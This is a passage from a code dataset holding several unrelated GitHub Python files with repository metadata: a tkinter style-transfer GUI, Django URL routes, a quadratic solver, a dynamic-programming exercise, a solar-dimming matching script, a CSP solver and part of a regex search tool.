newImageSizeHeight)\r\n#Canvas1.pack(expand=True,fill=BOTH)\r\n\r\nl1=Label(root,image=img)\r\nl1.grid(rowspan=905, columnspan=newImageSizeWidth)\r\n#headingFrame1 = Frame(root,bg=\"#FFBB00\",bd=5)\r\n#headingFrame1.place(relx=0.2,rely=0.1,relwidth=0.6,relheight=0.16)\r\n#headingLabel = Label(headingFrame1, text=\"Welcome to \\n artistic style\", bg='black', fg='white', font=('Courier',15))\r\n#headingLabel.place(relx=0,rely=0, relwidth=1, relheight=1)\r\nbtn1 = Button(root,text=\"Add Your photo\",bg='black', fg='white',command=lambda:addphoto())\r\nbtn1.place(relx=0.65,rely=0.3, relwidth=0.3,relheight=0.1)\r\n \r\nbtn2 = Button(root,text=\"select a style\",bg='black', fg='white',command=lambda:addstyle())\r\nbtn2.place(relx=0.65,rely=0.4, relwidth=0.3,relheight=0.1)\r\n \r\nbtn3 = Button(root,text=\"start transform\",bg='black', fg='white',command=lambda:bb(i))\r\nbtn3.place(relx=0.65,rely=0.5, relwidth=0.3,relheight=0.1)\r\n\r\nbtn4 = Button(root,text=\"print image\",bg='black', fg='white',command=lambda:printer1())\r\nbtn4.place(relx=0.65,rely=0.6, relwidth=0.3,relheight=0.1)\r\n\r\nbtn5 = Button(root,text=\"close window\",bg='black', fg='white',command=lambda:quit())\r\nbtn5.place(relx=0.65,rely=0.7, relwidth=0.3,relheight=0.1)\r\n\r\n###########################\r\n\r\ndef addphoto():\r\n Root1 = tkinter.Tk()\r\n Root1.withdraw() # Hide the Tkinter.Tk() instance\r\n default_dir = \"content\"\r\n if os.path.isfile(r'output\\1.jpg'):\r\n os.remove(r'output\\1.jpg')\r\n file_path = tkinter.filedialog.askopenfilename(title=u'select file', initialdir=(os.path.expanduser(default_dir)))\r\n image = Image.open(file_path)\r\n image.save(r'output\\1.jpg')\r\n \r\n###########################\r\ndef addstyle():\r\n Root1 = tkinter.Tk()\r\n Root1.withdraw() # Hide the Tkinter.Tk() instance\r\n default_dir = \"styles\"\r\n if os.path.isfile(r'output\\2.jpg'):\r\n os.remove(r'output\\2.jpg')\r\n file_path = tkinter.filedialog.askopenfilename(title=u'select file', initialdir=(os.path.expanduser(default_dir)))\r\n image = Image.open(file_path)\r\n image.save(r'output\\2.jpg')\r\n tkimage = ImageTk.PhotoImage(image)\r\n myvar=Label(Root1,image = tkimage)\r\n myvar.image = tkimage\r\n myvar.pack()\r\n################################## \r\ndef tensor_to_image(tensor):\r\n tensor = tensor*255\r\n tensor = np.array(tensor, dtype=np.uint8)\r\n if np.ndim(tensor)>3:\r\n assert tensor.shape[0] == 1\r\n tensor = tensor[0]\r\n return PIL.Image.fromarray(tensor)\r\n##########################################################\r\ndef bb(i1):\r\n content_path = r'output\\1.jpg'\r\n style_path = r'output\\2.jpg'\r\n content_image = load_img(content_path)\r\n style_image = load_img(style_path)\r\n hub_model = hub.load('magenta_arbitrary-image-stylization-v1-256_2')\r\n stylized_image = hub_model(tf.constant(content_image), tf.constant(style_image))[0]\r\n tensor_to_image(stylized_image)\r\n l=str(i1)\r\n tensor_to_image(stylized_image).save(\"finaloutput/\"+l+\".jpg\")\r\n global i\r\n i+=1\r\n \r\n####################################\r\ndef load_img(path_to_img):\r\n \r\n img2 = tf.io.read_file(path_to_img)\r\n img2 = tf.image.decode_image(img2, channels=3)\r\n img2 = tf.image.convert_image_dtype(img2, tf.float32)\r\n shape = tf.cast(tf.shape(img2)[:-1], tf.float32)\r\n max_dim = 900\r\n long_dim = max(shape)\r\n scale = max_dim / long_dim\r\n new_shape = tf.cast(shape * scale, tf.int32)\r\n img2 = tf.image.resize(img2, new_shape)\r\n img2 = img2[tf.newaxis, :]\r\n return img2\r\n##########################################################\r\ndef printer1():\r\n Root2 = tkinter.Tk()\r\n Root2.withdraw() # Hide the Tkinter.Tk() instance\r\n default_dir = \"finaloutput\"\r\n file_path = tkinter.filedialog.askopenfilename(title=u'select file', initialdir=(os.path.expanduser(default_dir)))\r\n image = Image.open(file_path)\r\n im_width, im_height = image.size\r\n if im_width > im_height:\r\n image = image.rotate(90)\r\n image.thumbnail((im_height, im_width), Image.ANTIALIAS)\r\n printer.printImage(image, False)\r\n printer.justify('C')\r\n printer.setSize('S')\r\n printer.println(\"PolaPi-Zero\")\r\n printer.feed(3)\r\n##################################################################\r\ndef quit():\r\n root.destroy()\r\n \r\n\r\nmainloop()\r\n","repo_name":"GhaithAli1997/Artistic-Style","sub_path":"test/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30030445429","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n # inicio\n url(r'^inicio', views.buscar_por_cliente, name='index'),\n\n # resultado busqueda por letra\n url(r'^browse/(?P[-\\w]+)/$', views.browse, name='browse'),\n\n # ########################## Cliente ########################## #\n\n # Crear cliente\n url(r'^crear_cliente/$', views.crear_cliente, name='crear_cliente'),\n\n # detalle del cliente\n url(r'^detalle/(?P[-\\w]+)/$', views.detalle_cliente, name='detalleCliente'),\n\n # buscar la orden\n url(r'^cliente/buscar/$', views.buscar_por_cliente, name='buscar_por_cliente'),\n\n # Borrar cliente\n url(r'^detalle/(?P[-\\w]+)/edit/borrar/$', views.borrar_cliente, name='borrarCliente'),\n\n # alerta Borrar cliente\n url(r'^detalle/(?P[-\\w]+)/edit/alerta/$', views.alerta_borrar_cliente, name='alertaBorrarCliente'),\n\n # editar cliente\n url(r'^detalle/(?P[-\\w]+)/edit/$', views.editar_cliente, name='editarCliente'),\n\n # ########################## Orden ########################## #\n\n # crear la orden\n url(r'^crear_orden/(?P[-\\w]+)/$', views.crear_orden, name='crear_orden'),\n\n # detalle de la orden\n url(r'^orden/(?P[-\\d]+)/$', views.detalle_orden, name='orden'),\n\n # editar la orden\n url(r'^orden/(?P[-\\d]+)/edit/$', views.editar_orden, name='editarOrden'),\n\n # buscar la orden\n url(r'^orden/buscar/$', views.buscar_por_ordenes, name='buscar_por_ordenes'),\n\n # alerta Borrar orden\n url(r'^orden/(?P[-\\d]+)/edit/alerta/$', views.alerta_borrar_orden, name='alertaBorrarOrden'),\n\n # borrar la orden\n url(r'^orden/(?P[-\\d]+)/borrar/$', views.borrar_orden, name='borrarOrden'),\n\n # ########################## Trabajo ########################## #\n\n # crear trabajo\n url(r'^crear_trabajo/(?P[-\\d]+)/$', views.crear_trabajo, name='crear_trabajo'),\n\n # detalle trabajo\n url(r'^trabajo/(?P[-\\d]+)/$', views.detalle_trabajo, name='trabajo'),\n\n # editar trabajo\n url(r'^trabajo/(?P[-\\d]+)/edit/$', views.editar_trabajo, name='editar_trabajo'),\n\n # alerta Borrar trabajo\n url(r'^trabajo/(?P[-\\d]+)/edit/alerta/$', views.alerta_borrar_trabajo, name='alerta_borrar_trabajo'),\n\n # borrar trabajo\n url(r'^trabajo/(?P[-\\d]+)/borrar/$', views.borrar_trabajo, name='borrar_trabajo'),\n\n\n # calculadora de precios\n url(r'^calculador/$', views.calculador, name='calculador'),\n\n # contacto\n url(r'^contacto/$', views.contacto, name='contacto'),\n\n]","repo_name":"Alialmandoz/ArchivoImprimirWebApp","sub_path":"cliente/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"41524282719","text":"import math\ndef polynomial (a, b, c):\n delta = (b**2) - 4*a*c\n if delta<0:\n delta = math.sqrt(delta*(-1))\n p1 = round(-b/(2*a), 2)\n p2 = round(delta/(2*a), 2)\n s_x1 = str(p1) + ' + ' + str(p2) + 'i'\n s_x2 = str(p1) + ' - ' + str(p2) + 'i' \n return s_x1, s_x2\n else:\n delta = math.sqrt(delta)\n x1 = round((-b + delta)/(2*a), 2)\n x2 = round((-b - delta)/(2*a), 2)\n return x1, x2\n\na = int(input(\"Type the a parameter: \"))\nb = int(input(\"Type the b parameter: \"))\nc = int(input(\"Type the c parameter: \"))\nx1, x2 = polynomial(a, b, c)\n\nprint(f\"\\nFunction's law is: {a}x^2 + {b}x + {c}\")\nprint(f\"The function roots are {x1} and {x2} .\\n\")","repo_name":"MouraCtrlSF6/Python_Learning","sub_path":"Exercises/SquareFunction.py","file_name":"SquareFunction.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"43916992081","text":"#User function Template for python3\n\nclass Solution:\n \n #Function to find length of shortest common supersequence of two strings.\n def shortestCommonSupersequence(self, X, Y, m, n):\n return m + n - self.lcs(X, Y)\n \n def lcs(self, w1, w2):\n n1, n2 = len(w1), len(w2)\n dp = [0] * (n2 + 1)\n \n for i in range(1, n1 + 1):\n temp = [0] * (n2 + 1)\n for j in range(1, n2 + 1):\n if w1[i - 1] == w2[j - 1]:\n temp[j] = dp[j - 1] + 1\n else:\n temp[j] = max(dp[j], temp[j - 1])\n dp = temp\n \n return dp[n2]\n\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\n#contributed by RavinderSinghPB\nif __name__ == '__main__': \n t=int(input())\n for tcs in range(t):\n X,Y=input().split()\n \n print(Solution().shortestCommonSupersequence(X,Y,len(X),len(Y)))\n \n# } Driver Code Ends","repo_name":"robinsdeepak/leetcode","sub_path":"Shortest Common Supersequence - GFG/shortest-common-supersequence.py","file_name":"shortest-common-supersequence.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"72723946344","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 16:02:21 2016\n\n@author: alyshareinard\n\"\"\"\n\nfrom datetime import timedelta, datetime\nimport math\nimport os\nimport numpy as np\nimport pandas as pd\nimport get_yashiro_catalog as CMEs\nfrom get_flare_catalog import get_flare_catalog\nfrom read_Lars_peakdim import read_Lars_peakdim\n\nglobal data_path\ndata_path=os.path.join(os.path.dirname(os.path.realpath(__file__)), \"data\")\n\ndef determine_best_flare(time_match, big_match, verbose=False):\n \"\"\"This is where the logic is for choosing the best flare when the flare \n closest in time is not the biggest. The inputs are the time difference \n between the biggest flare and the dimming (big_diff), the time difference \n between the closest flare in time and the dimming (time_diff), the size of \n the biggest flare (big_size) and the size of the flare closest in \n time (time_size) and the indices for each (big_ind and time_ind)\"\"\"\n \n if verbose==True:\n print(\"Time difference from biggest flare to dimming: \", big_match[\"time_diff\"])\n print(\"Time difference from closest flare in time to dimming: \", time_match[\"time_diff\"])\n if big_match[\"time_diff\"]biggest_size:\n biggest_index=index\n biggest_size=fl_size[index]\n biggest_mag=fl_mag[index]\n return biggest_index\n\ndef is_nat(npdatetime):\n \"\"\"program to determine if a date is not a time -- \n for picking out missing/fill values\"\"\"\n try:\n npdatetime.strftime('%x')\n return False\n except:\n return True\n \ndef create_datetime_cme(ymd, hm):\n date=[]\n #unpack ymd and fix year\n\n for item, ihm in zip(ymd, hm):\n\n if pd.isnull(item)==True:\n date.append(None)\n continue\n \n datestr=str(item).split(\"/\")\n year=int(datestr[0])\n month=int(datestr[1])\n day=int(datestr[2])\n# print(ihm)\n hms=ihm.split(\":\")\n hour=int(hms[0])\n minute=int(hms[1])\n\n try:\n date.append(datetime(year, month, day, hour, minute))\n\n except:\n print(year, month, day, hour, minute, \"is not a valid date, skipping\")\n date.append(None)\n return date\n \ndef create_datetime_flare(ymd, hm):\n \"\"\"create datetime for hand selected flare data\"\"\"\n \n date=[]\n #unpack ymd and fix year\n\n for item, ihm in zip(ymd, hm):\n\n if item==\" \" or np.isnan(item)==True:\n date.append(None)\n continue\n \n datestr=str(item)\n year=int(datestr[0:2])\n month=int(datestr[2:4])\n day=int(datestr[4:6])\n\n #fix two year dates without messing up 4 year dates\n if year<70: \n year=year+2000\n elif year<100: \n year+=1900\n \n if math.isnan(ihm)==False:\n hour=math.floor(ihm/100)\n minute=math.floor(ihm-hour*100)\n\n #now check to see if the time is past 2400 and adjust\n if hour>=24:\n hour-=24\n day+=1\n [day, month, year]=check_daymonth(day, month, year)\n\n try:\n date.append(datetime(year, month, day, hour, minute))\n# print(\"CHECKIT\", date[-1])\n except:\n print(year, month, day, hour, minute, \"is not a valid date, skipping\")\n date.append(None)\n else:\n date.append(None)\n return date\n \ndef read_hand_flares():\n \"\"\"reads in file containing the flares chosen by hand\"\"\"\n \n file=os.path.join(data_path, \"dim_flare_hand.txt\")\n \n names=[\"dim_name\", \"date\", \"start\", \"end\", \"peak\", \"loc\", \"flare_class\", \n \"flare_size\", \"station\", \"something\", \"AR\", \"LarAR\"]\n data=pd.read_csv(file, sep=\" \", header=None, names=names)\n\n data[\"init_date\"]=create_datetime_flare(data[\"date\"], data[\"start\"])\n data[\"peak_date\"]=create_datetime_flare(data[\"date\"], data[\"peak\"])\n data[\"final_date\"]=create_datetime_flare(data[\"date\"], data[\"end\"]) \n\n data[\"date\"]=data[\"peak_date\"]\n return data\n \ndef read_hand_cmes():\n \"\"\"reads in file containing the CMEs chosen by hand\"\"\"\n\n file=os.path.join(data_path, \"dim_cme_hand.txt\")\n \n names=[\"dim_name\", \"date\", \"time\", \"PA\", \"width\", \"speed_lin\", \"speed_20init\", \n \"speed_20final\", \"speed_2020\", \"accel\", \"mass\", \"ke\", \"mpa\"]\n data=pd.read_csv(file, sep=\" \", header=None, names=names)\n# print(\"all the times\", data)\n data[\"date\"]=create_datetime_cme(data[\"date\"], data[\"time\"])\n# print(data[\"date\"])\n return data\n\ndef calc_loc_diff(flare_loc, dim_ns, dim_ew):\n \"\"\"takes a flare coordinate location and a dimming NS and EW and determines\n the cartesian distance between the dimming and flare\"\"\"\n if flare_loc !=None and type(flare_loc)==str: \n \n ns=int(flare_loc[1:3])\n if flare_loc[0]==\"S\": ns=-ns\n ew=int(flare_loc[4:6])\n if flare_loc[3]==\"E\": ew=-ew\n \n ns_diff=ns-dim_ns\n ew_diff=ew-dim_ew\n\n ##this is kind of a cludge -- assumes 2D not 3D -- not sure a more robust method is necessary\n dist=math.sqrt(ns_diff*ns_diff+ew_diff*ew_diff)\n return dist\n else:\n return None\n\ndef compare_flare_hand(target, auto, events, conf):\n \"\"\"steps through dimmings and compares the auto matches to the hand matches\"\"\"\n \n hand_matches=read_hand_flares() \n\n ind2=0\n mat=[]\n \n for index in range(len(target[\"date\"])):\n while target[\"dim_name\"][index][0:13]!=hand_matches[\"dim_name\"][ind2][0:13]:\n ind2=ind2+1 \n\n if ind2>len(hand_matches)-1:\n break\n\n mat.append(ind2) \n \n [same, diff, auto_nohand, hand_noauto, null] = calc_overall_stats(auto['date'], conf, mat, hand_matches['date'], target[\"dim_name\"]) \n \n print(\" \")\n print(\" \")\n print(\"Overall statistics\")\n print(\"same flare: \", same)\n print(\"same null: \", null)\n print(\"hand match but no automated match\", hand_noauto)\n print(\"automated match but no hand match\", auto_nohand)\n print(\"diff: \", diff)\n print(\"accuracy: \", 100*round((same+null)/(same+null+diff+hand_noauto+auto_nohand), 3), \"%\")\n \n #make a location mask\n is_location=[]\n for ind in range(len(auto)):\n if ind==None: #if there is no match\n is_location.append(False) ###determines whether nulls go into no location or location piles\n elif auto['location'][ind]==None:\n is_location.append(False)\n else:\n is_location.append(True)\n \n auto_loc=[]\n conf_loc=[]\n mat_loc=[]\n target_name_loc=[]\n\n #take only events with location\n auto_date=auto['date']\n for ind in range(len(is_location)):\n if is_location[ind]:\n auto_loc.append(auto_date[ind])\n conf_loc.append(conf[ind])\n mat_loc.append(mat[ind])\n target_name_loc.append(target[\"dim_name\"][ind])\n \n [same, diff, auto_nohand, hand_noauto, null] = calc_overall_stats(auto_loc, conf_loc, mat_loc, hand_matches[\"date\"], target_name_loc)\n \n print(\" \")\n print(\" \")\n print(\"When we know the location\") \n print(\"Overall statistics\")\n print(\"same flare: \", same)\n print(\"same null: \", null)\n print(\"hand match but no automated match\", hand_noauto)\n print(\"automated match but no hand match\", auto_nohand)\n print(\"diff: \", diff)\n print(\"accuracy: \", 100*round((same+null)/(same+null+diff+hand_noauto+auto_nohand), 3), \"%\")\n \n \ndef compare_cme_hand(target, auto, events, conf):\n \"\"\"steps through dimmings and compares the auto matches to the hand matches\"\"\"\n \n hand_matches=read_hand_cmes() \n ind2=0\n mat=[]\n \n for index in range(len(target[\"date\"])):\n\n\n while target[\"dim_name\"][index][0:13]!=hand_matches[\"dim_name\"][ind2][0:13]:\n ind2=ind2+1 \n\n if ind2>len(hand_matches)-1:\n break\n\n mat.append(ind2) \n \n [same, diff, auto_nohand, hand_noauto, null] = calc_overall_stats(auto['date'], conf, mat, hand_matches['date'], target[\"dim_name\"]) \n \n print(\" \")\n print(\" \")\n print(\"Overall statistics\")\n print(\"same CME: \", same)\n print(\"same null: \", null)\n print(\"hand match but no automated match\", hand_noauto)\n print(\"automated match but no hand match\", auto_nohand)\n print(\"different CME: \", diff)\n print(\"accuracy: \", 100*round((same+null)/(same+null+diff+hand_noauto+auto_nohand), 3), \"%\")\n \ndef flare_size(mag, size):\n \"\"\" takes a flare magnitude and returns a decimal value indicating size\"\"\"\n\n if mag=='B':\n return size\n elif mag=='C':\n return size*10.\n elif mag=='M':\n return size*100.\n elif mag=='X':\n return size*1000.\n else:\n print(\"flare size not valid\")\n return None \n \ndef coord2pa(ew_coord, ns_coord):\n \"\"\"routine to translate ew/ns coordinates into position angle\"\"\"\n \n x=ew_coord*1.0\n y=ns_coord*1.0\n if y!=0:\n pa=np.arctan(-x/y)\n else:\n pa=3.1415926/2. #limit of arctan(infinity)\n\n pa=pa*180.0/3.1415926\n\n if y<0:\n pa=pa+180 \n if pa<0:\n pa=pa+360\n \n if x==0 and y==0:\n pa=-1\n\n return pa\n \ndef match_dimmings_flaresCMEs(event_type='flares', print_results=False, hand_compare=False, training=False, start_year=2013, end_year=2017):\n \"\"\"This is the main program. The inputs are several keywords\n \n event_type: which can be 'cmes' or 'flares'\n print_results: whether you get a printout of all the target dimmings/auto matches/hand matches\n hand_compare: whether you want to compare with a hand drawn list\n training: whether you want to take a portion of the data for training purposes or all of it\n \n Given that the program reads in the dimming data and the CME or flare data and does the automatching\n \n at the top of the file are some configurable parameters. \n FDmaxDist: maximum distance in degrees that the routine will look for an associated flare\n CDmaxAngle: maximum angle in degrees that the routine will look for an associated CME\n Fmaxhours: maximum number of hours positive/negative that the routine will look for an associated flare\n Cmaxhours_before: maximum number of hours positive/negative that the routine will look for an associated CME\n Cmaxhours_after: maximum number of hours after the dimming that the routine will look for an associated CME\n \"\"\"\n \n FDmaxDist=20\n CDmaxAngle=45\n Cmaxhours_before=4\n Cmaxhours_after=2\n Fmaxhours_before=4\n Fmaxhours_after=2\n \n if event_type==\"flares\":\n timeafter=timedelta(hours=Fmaxhours_after)\n timebefore=timedelta(hours=Fmaxhours_before)\n elif event_type==\"cmes\": \n timeafter=timedelta(hours=Cmaxhours_after)\n timebefore=timedelta(hours=Cmaxhours_before)\n \n dimmings=read_Lars_peakdim(data_path, training=training)\n if event_type=='flares':\n (events, ha_notimplemented)=get_flare_catalog(data_path, start_year, end_year)\n events['date']=events['peak_date'] #this can be used to chose initial_date if needed -- need to also change in read_hand_flares\n elif event_type == 'cmes':\n events=CMEs.get_yashiro_catalog(data_path)\n else:\n print(\"not a valid event selection\")\n \n #first check to make sure there is some overlap in dates\n min_dimtime=min(dimmings['date'])\n max_dimtime=max(dimmings['date'])\n \n min_event=min(events['date'])\n max_event=max(x for x in events['date'] if x is not None)\n \n print(\"\\nEvent times:\", min_event, max_event)\n print(\"Dimming times:\", min_dimtime, max_dimtime)\n \n if ((min_eventmin_dimtime) or (min_eventmax_dimtime)):\n print(\"Event times overlap with dimming times, calculating matches\")\n else:\n print(\"event_times do not overlap with dimming times, returning\")\n return 0\n \n\n #let's start with stepping through the dimmings\n match_time=[]\n match_dist=[]\n match_big=[]\n target_time=[]\n target_name=[]\n\n for ind1 in range(len(dimmings['date'])):\n\n dim_ew=dimmings['mean_EW'][ind1]\n dim_ns=dimmings['mean_NS'][ind1]\n \n target_time.append(dimmings['date'][ind1])\n target_name.append(dimmings['dim_name'][ind1])\n\n possibilities=[]\n distance=[]\n \n #we loop over all the events and create arrays for match_time, match_big, match_dist -- these may not be the same\n for ind2 in range(len(events['date'])):\n \n dimtime=dimmings['date'][ind1]\n# print(\"ind2\", ind2, len(events['date']))\n eventtime=events['date'][ind2]\n\n\n if eventtime !=None and eventtime<(dimtime+timeafter) and eventtime>(dimtime-timebefore):\n #now check location\n if event_type=='flares':\n event_loc=events['location'][ind2]\n\n dist=calc_loc_diff(event_loc, dim_ns, dim_ew)\n\n if dist == None or dist1:\n\n dist=[]\n time_diff=[]\n event_size=[]\n\n for x in possibilities:\n\n t_diff=(dimtime - events['date'][x])\n time_diff.append(round((t_diff.days*86400+t_diff.seconds)/60./60., 2))\n\n if event_type=='flares':\n\n event_size.append(flare_size(events['xray_class'][x], events['xray_size'][x]))\n if event_type==\"cmes\":\n event_size.append(events[\"mass\"][x])\n \n biggest=event_size.index(max(event_size)) #index of the largest event in the small \n# print(\"these are the sizes\", event_size)\n# print(\"this is the biggest\", biggest)\n match_big.append(possibilities[biggest])\n\n\n tdiff_absfloat=[abs(float(x)) for x in time_diff]\n shortest_time=tdiff_absfloat.index(min(tdiff_absfloat))\n\n\n dist_exists=False\n for val in dist:\n if val!=None:\n dist_exists=True\n \n if len(dist)>0 and dist_exists: \n shortest_dist=dist.index(min(dist))\n else:\n shortest_dist=None\n\n match_time.append(possibilities[shortest_time])\n if shortest_dist==None:\n match_dist.append(None)\n elif shortest_dist==shortest_time:\n match_dist.append(None)\n else:\n match_dist.append(possibilities[shortest_dist]) \n\n #now we've finished determining the match that's closest in time, distance, and the largest, \n #so we use determine_conf_best_xxx to find the best match. \n conf=[]\n auto=[]\n nulls=[None for x in events.keys()] #fill value for events with no matches\n\n \n# #initialize match dataframe -- we\n# if event_type==\"flares\":\n# (best, confidence)= determine_conf_best_flare(match_time[0], match_big[0], match_dist[0], target_time[0], events)\n# elif event_type==\"cmes\":\n# (best, confidence)= determine_conf_best_cme(match_time[0], match_big[0], match_dist[0], target_time[0], events)\n# conf=[confidence]\n# auto=[best]\n matches=[]\n\n\n for index in range(len(target_time)): \n if event_type==\"flares\":\n (best, confidence)=determine_conf_best_flare(match_time[index], match_big[index], match_dist[index], target_time[index], events)\n elif event_type==\"cmes\":\n (best, confidence)= determine_conf_best_cme(match_time[index], match_big[index], match_dist[index], target_time[index], events)\n conf.append(confidence)\n auto.append(best)\n\n if best !=None:\n matches.append(events.iloc[best].tolist())\n else:\n matches.append(nulls)\n\n matches=pd.DataFrame(matches, columns=events.keys())\n if event_type==\"flares\":\n output_summary_flares(dimmings, matches)\n elif event_type==\"cmes\":\n output_summary_cmes(dimmings, matches)\n\n if print_results==True and event_type==\"flares\":\n print_summary_flares(dimmings, events, matches, hand=hand_compare)#, event_type=event_type)\n elif print_results==True and event_type==\"cmes\":\n print_summary_cmes(dimmings, events, matches, hand=hand_compare)\n\n if hand_compare==True and event_type==\"flares\":\n compare_flare_hand(dimmings, matches, events, conf)\n elif hand_compare==True and event_type==\"cmes\":\n compare_cme_hand(dimmings, matches, events, conf)\n\n\n\n return matches\n \n\n \nauto_matches=match_dimmings_flaresCMEs(event_type='flares', print_results=False, hand_compare=False, training=False, start_year=2010, end_year=2017)\n\n ","repo_name":"alyshareinard/dimmings","sub_path":"match_dimmings_flares.py","file_name":"match_dimmings_flares.py","file_ext":"py","file_size_in_byte":30226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"6012234195","text":"# from functools import reduce\nimport copy, random, numpy as np\nfrom collections import Counter\nimport functools\n\"\"\"\nnum - number of elements in csp, with or without constraints\nlinks - list \npossibleValues\n\"\"\"\ndef isUnique(link, vals):\n return not any([x != None and vals.count(x) > 1 for x in vals])\n\nclass CSP:\n def __init__(self, links, possibleValues=[], f=isUnique):\n self.num = len(set(np.concatenate(links)))\n self.links = links\n self.possibleValues = possibleValues\n self.nodesOpened = 0\n self.isConstraintOk = f\n def backtrack(self, assignment):\n #Extract non-assigned yet nodes\n nonasssigned=[el for el in assignment if el[0] is None]\n self.nodesOpened += 1\n if not nonasssigned:\n #we're done, everything assigned\n return [el[0] for el in assignment]\n #Choose the node with minimal number of possible values left. Thta's the node we will assign in this recursive call\n elIndex = assignment.index(min(nonasssigned, key = lambda x:len(x[1])))\n #Iterate over possible values on chosen node.\n for possibleValue in assignment[elIndex][1]:\n assignment[elIndex][0]=possibleValue\n relatedLinks=[el for el in self.links if elIndex in el]\n #Go through all unassigned nodes and do forward remove of impossible values due to constraint function\n #Have a map for forvard removed values to be able to rollback changes. Due to this we don't need to make copy of whole csp on each recursive call\n forwardRemove={}\n #Check if chosen possible value is not being constrained by 'isConstraintOk' function\n if all([self.isConstraintOk(link, [assignment[i][0] for i in link]) for link in relatedLinks]):\n #possible value can be assigned - let's do the forward check and remove all constrained values on neighbour nodes (after this assignment)\n for link in relatedLinks:\n for nodeIndex in link:\n if nodeIndex != elIndex and assignment[nodeIndex][0] == None:\n toRemove=[]\n for forwardValue in assignment[nodeIndex][1]:\n assignment[nodeIndex][0]=forwardValue\n if not self.isConstraintOk(link,[assignment[index][0] for index in link]):\n toRemove.append(forwardValue)\n assignment[nodeIndex][0]=None\n assignment[nodeIndex][1] = [el for el in assignment[nodeIndex][1] if el not in toRemove]\n if nodeIndex in forwardRemove:\n forwardRemove[nodeIndex] += toRemove\n else:\n forwardRemove[nodeIndex] = toRemove\n #Now, when forward check was done - let's go deeper into search tree with new assignemnt\n res = self.backtrack(assignment)\n #This will return a valid complete assignment when algorithm will reach the full valid assignment and recurse back.\n if not res is None:\n return res\n #Rollback changes done in this iteration (we get here only if the prvious path led us to conflict)\n assignment[elIndex][0]=None\n for el, removedItems in list(forwardRemove.items()):\n assignment[el][1]+=removedItems\n #There are no possible values for this node. Sad, but we went wrong way on search tree. Recurse back to previous tree leaf and try another path.\n return None\n #Prepare possible values for each of nodes in graph. Currently it is expected that all of them initially wil have the same set\n def solve(self):\n return self.backtrack([[None, self.possibleValues[:]] for l in range(self.num)])\n\n\"\"\"GRAPH\"\"\"\n# csp = CSP(6, ((0, 1), (0, 2), (0, 3), (1, 2), (1, 4), (1, 5), (2, 3), (2, 4), (3, 4), (3, 5), (4, 5)), ['r', 'b', 'g'])\n# print(csp.solve())\n# print('Nodes opened:',csp.nodesOpened)\n\n\"\"\"SUDOKU\"\"\"\n# Size of sudoku and how many % of numbers should be hidden\n# bs, hide = 4, 70\n# bs2, bs3, bs4=bs**2, bs**3, bs**4\n# links=[[a+bs2*i-1 for a in range(1, bs2+1)] for i in range(bs2)]+\\\n# [[a+bs2*i-1 for i in range(0, bs2)] for a in range(1, bs2+1)]+\\\n# list(np.concatenate([[np.concatenate([[x+bs2*i+bs*j+bs3*k-1 for x in range(1, bs+1)] for i in range(bs)]) for j in range(bs)] for k in range(bs)]))\n# vals = list(range(1, bs2+1))\n# random.shuffle(vals)\n# csp = CSP(links, vals)\n# solvedSudoku = csp.solve()\n# #Print res\n# print((np.array(solvedSudoku).reshape(bs2, bs2)))\n# for i in range(bs4*hide//100):\n# solvedSudoku[random.randint(0, bs4-1)]=''\n# print(np.core.defchararray.rjust(np.array(solvedSudoku).reshape(bs2, bs2), 3 ,' '))\n# print(('Nodes opened:',csp.nodesOpened))\n","repo_name":"samkowskiykostya/Algos","sub_path":"practical/csp.py","file_name":"csp.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34888475139","text":"#!/usr/bin/env python3\nimport argparse\nimport re\n# The script demonstrates using of Factory method design pattern\n# where matcher using factory method and receives appropriate matcher based on the user flags\n\nman_page = \"\"\" \n Search Helper\n The script will find regex in the provided list of files to search in. \n and will print in the following format 'file_name line_number line'\n \n The flag -r is mandatory \n \n If --files parameter is missing, the script will take input from STDIN.\n When --files is provided it is mandatory to specify existing filename\n \n Example: Search any letter in STDIN >>>python3 SearchHelper.py -r [a-z]\n Example: Search any letter in provided Files >>>python3 SearchHelper.py -r [a-z] -f input.txt input2.txt\n \"\"\"\n\n# Output in the format: 'file_name line_number line'\nclass DefaultMatcher:\n\n def print_result(self, filename, file, pattern):\n for ind, line in enumerate(file):\n for match in re.finditer(pattern, line):\n print(\"{} {} {}\".format(filename, ind + 1, line))\n\n\n# Output in the format: 'file_name:line_number:start_position:matched_text'\nclass MachineMatcher:\n\n def print_result(self, filename, file, pattern):\n for ind, line in enumerate(file):\n for match in re.finditer(pattern, line):\n start = match.start()\n end = match.end()\n print(\"{}:{}:{}:{}\".format(filename, ind + 1, line, line[start:end]))\n\n\n# Output in the format: 'file_name line_number line' matched text is highlighted in color\nclass ColorMatcher:\n\n def print_result(self, filename, file, pattern):\n OKGREEN = '\\033[92m'\n ENDC = '\\033[0m'\n for ind, line in enumerate(file):\n for match in re.finditer(pattern, line):\n start = match.start()\n end = match.end()\n print(\"{} {} {}\".format(filename, ind + 1\n , line[:start] + OKGREEN + line[start:end] + ENDC + line[end:]))\n\n\n# Output in the format: 'file_name line_number line' '^' is printed underneath the matched text\nclass UnderLineMatcher:\n\n def print_result(self, filename, file, pattern):\n for ind, line in enumerate(file):\n for match in re.finditer(pattern, line):\n start = match.start()\n end = match.end()\n prefix = \"{} {} {}\".format(filename, (ind + 1), line[:start])\n suffix = \"{}\".format(line[end:])\n print(\"{}{}{}\".format(prefix, line[start:end], suffix))\n print(\"{}{}\".format(\" \" * len(prefix), \"^\" * len(line[start:end]) + \" \" * len(suffix)))\n\n\ndef 